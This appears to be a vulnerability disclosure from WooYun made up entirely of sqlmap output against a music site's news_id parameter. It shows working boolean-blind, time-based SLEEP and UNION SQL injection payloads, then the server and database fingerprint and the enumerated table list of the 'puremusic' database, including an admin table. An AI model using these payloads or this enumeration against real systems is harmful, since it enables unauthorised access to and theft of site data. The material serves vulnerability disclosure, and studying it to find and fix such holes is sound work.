WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=696 AND 3192=3192&languages_id=tw
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=696 AND (SELECT * FROM (SELECT(SLEEP(5)))DcWX)&languages_id=tw
    Type: UNION query
    Title: Generic UNION query (NULL) - 22 columns
    Payload: news_id=696 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x79565262424d654a734b,0x7178787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &languages_id=tw
---
web server operating system: FreeBSD 9.2
web application technology: Apache 2.4.6, PHP 5.4.19
back-end DBMS: MySQL 5.0.12
current database:    'puremusic'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] puremusic
[*] test

Database: puremusic
[9 tables]
+----------------+
| admin          |
| pm_ad          |
| pm_artists     |
| pm_artists_img |
| pm_favopite    |
| pm_link        |
| pm_movie       |
| pm_news        |
| web_info       |
+----------------+